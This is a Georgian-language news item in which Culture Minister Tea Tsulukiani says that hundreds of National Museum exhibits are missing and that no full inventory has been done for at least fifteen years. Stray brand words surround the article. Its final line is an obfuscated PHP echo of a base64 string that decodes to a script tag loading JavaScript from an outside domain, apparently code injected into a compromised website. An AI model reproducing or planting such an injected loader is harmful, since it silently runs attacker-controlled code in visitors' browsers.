celsiusi
ავერსი საქკაბელი
ექსპონატების დიდი რაოდენობა გამქრალია, – ამის შესახებ კულტურის მინისტრმა, თეა წულუკიანმა საქართველოს პირველი არხის ეთერში სტუმრობისას განაცხადა.
 
„არის სხვა ექსპონატები, ასეულობით, რომლებიც არ არის ადგილზე, მაგრამ ვიცით, სად შეიძლება, იყოს. მაგალითად, როდესაც ვამბობთ, რომ რომელიღაც საელჩოში გაიგზავნა, თვის დროზე. შემდეგ, ჩვენ ვცდილობთ მათ დაბრუნებას, ვაბრუნებთ და შეიძლება, აღმოჩნდეს, რომ სხვადასხვა კეთილსინდისიერი ელჩის თანმიმდევრობაში ეს ექსპონატები იქნა შემონახული და სრულად ბრუნდება. ზოგჯერ, სრულად ვერ ბრუნდება, მაგრამ, როდესაც ვამბობთ, რომ გამქრალია, აქ ვგულისხმობთ არა იმას, რომ ვიცით, სად შეიძლება, ვეძებოთ, არამედ არც კი ვიცით, სად ვეძებოთ. ვიცით, რომ მუზეუმში არსებობდა და კვალი იკარგება“, – განაცხადა წულუკიანმა.
 
კულტურის მინისტრის თქმით, იმისთვის, რათა დადგინდეს, როდის დაიკარგა ეს ექსპონატები, საჭიროა მოკვლევა და გამოძიება.
 
„ფაქტია, ინვენტარიზაცია ბოლო მინიმუმ, თხუთმეტი წლის განმავლობაში არ ჩატარებულა. ყოველ შემთხვევაში, იმ პერიოდიდან, როდესაც ეროვნული მუზეუმის გაერთიანება შეიქმნა, ეროვნული მუზეუმის გაერთიანების შესაბამის ხელმძღვანელობას სრულფასოვნად არასოდეს ჩაუტარებია ინვენტარიზაცია. ინვენტარიზაციები ტარდებოდა, მაგრამ საკმაოდ ზედაპირულად. ამას ადასტურებს სწორედ ეს შედეგი“, – განაცხადა წულუკიანმა.
414
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");